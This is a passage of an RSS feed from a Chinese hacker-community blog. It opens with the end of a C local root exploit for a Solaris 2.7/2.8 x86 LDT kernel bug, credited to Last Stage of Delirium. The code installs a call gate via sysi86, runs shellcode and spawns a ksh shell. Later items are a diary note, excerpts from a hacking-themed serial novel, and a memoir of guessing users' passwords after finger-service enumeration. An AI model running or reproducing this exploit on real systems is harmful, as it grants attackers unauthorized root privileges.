0xca,0x20,0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* lret&nbsp;&nbsp;&nbsp;&nbsp;$0x20&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*/<br/>&#125;;<br/><br/>main(int argc,char **argv)&#123;<br/>&nbsp;&nbsp; unsigned int adr;<br/>&nbsp;&nbsp; ucontext_t uc;struct ssd s;<br/><br/>&nbsp;&nbsp; printf("copyright LAST STAGE OF DELIRIUM apr 2001 poland&nbsp;&nbsp;//lsd-pl.net/&#92;n");<br/>&nbsp;&nbsp; printf("ldt kernel bug for solaris 2.7 2.8 x86&#92;n&#92;n");<br/><br/>&nbsp;&nbsp; getcontext(&uc);<br/>&nbsp;&nbsp; adr=uc.uc_mcontext.gregs[ESP]+12+4+4-(8<<2);<br/><br/>&nbsp;&nbsp; printf("esp=0x%08x adr=0x%08x&#92;n",uc.uc_mcontext.gregs[ESP],adr);<br/><br/>&nbsp;&nbsp; s.bo=adr;<br/>&nbsp;&nbsp; s.sel=0x44;<br/>&nbsp;&nbsp; s.ls=KCSSEL;<br/>&nbsp;&nbsp; s.acc1=GATE_UACC&#124;GATE_386CALL;<br/>&nbsp;&nbsp; s.acc2=8;<br/><br/>&nbsp;&nbsp; sysi86(SI86DSCR,&s);<br/>&nbsp;&nbsp; setuid(getuid());<br/>&nbsp;&nbsp; ((void(*)())asmcode)();<br/><br/>&nbsp;&nbsp; execl("/bin/ksh","lsd",0);<br/>&#125;<br/>
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/7/</link>
<title><![CDATA[近年末 事多发 ]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[心情日志]]></category>
<pubDate>Mon, 24 Dec 2007 04:27:39 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/7/</guid> 
<description>
<![CDATA[ 
	最近年终，很多事情要办 所以个人站点这好久没更新 记录一下&nbsp; 
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/6/</link>
<title><![CDATA[第一章十个不可能完成的任务（3）]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[连载小说]]></category>
<pubDate>Tue, 27 Nov 2007 18:49:21 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/6/</guid> 
<description>
<![CDATA[ 
	虽然他感觉到这个人可能是谁，沉思中的她一次再一次的否定的自己的猜测。不管留言风格，和入侵的手段和她所猜想的人有多么的相像可毕竟那是不可能的事情。Rocky 一个已经死去的人怎么可能入侵，不管他身前在网络的世界里像能上帝一样无所不能，但毕竟他是一个死去的人<br/>............<br/><br/>Tags - <a href="http://www.greenarmy.org/tags/%25E9%25BB%2591%25E5%25AE%25A2/" rel="tag">黑客</a> , <a href="http://www.greenarmy.org/tags/%25E7%25BB%25BF%25E8%2589%25B2%25E5%2585%25B5%25E5%259B%25A2/" rel="tag">绿色兵团</a> , <a href="http://www.greenarmy.org/tags/littlefish/" rel="tag">littlefish</a> , <a href="http://www.greenarmy.org/tags/goodwell/" rel="tag">goodwell</a> , <a href="http://www.greenarmy.org/tags/whoami/" rel="tag">whoami</a> , <a href="http://www.greenarmy.org/tags/shutdown/" rel="tag">shutdown</a> , <a href="http://www.greenarmy.org/tags/coldface/" rel="tag">coldface</a> , <a href="http://www.greenarmy.org/tags/dspman/" rel="tag">dspman</a> , <a href="http://www.greenarmy.org/tags/solo/" rel="tag">solo</a>
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/5/</link>
<title><![CDATA[第一章十个不可能完成的任务（2）]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[连载小说]]></category>
<pubDate>Sat, 17 Nov 2007 20:19:52 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/5/</guid> 
<description>
<![CDATA[ 
	“请大家放心，首先我们在安全上的投入是其他同行业的几倍，甚至比前三家被黑公司的安全投入的总额还多。我们拥有最先进的技术，可以随时监控每一个网络的请求和访问。我们的密钥体系是经过128 RSA 动态生成的口令，在理论上说他是不可能破解的，如果一定要加一个期限的话那就是“一万年”。<br/>............<br/>
]]>
</description>
</item><item>
<link>http://www.greenarmy.org/post/4/</link>
<title><![CDATA[中国的黑客从聊天室起步]]></title> 
<author>goodwell &lt;admin@yourname.com&gt;</author>
<category><![CDATA[回忆追溯]]></category>
<pubDate>Sat, 17 Nov 2007 18:45:54 +0000</pubDate> 
<guid>http://www.greenarmy.org/post/4/</guid> 
<description>
<![CDATA[ 
	我记得那时我们利用了finger@ 服务 。这个比较老的服务允许远程察看当前服务器的所有登陆用户。这是我们成功地第一步。我们猜出了很多上网用户的密码。<br/>............<br/><br/>Tags - <a href="http://www.greenarmy.org/tags/littlefish/" rel="tag">littlefish</a> , <a href="http://www.greenarmy.org/tags/%25E9%25BB%2591%25E5%25AE%25A2/" rel="tag">黑客</a>
]]>
</description>
</item>
</channel>
</rss>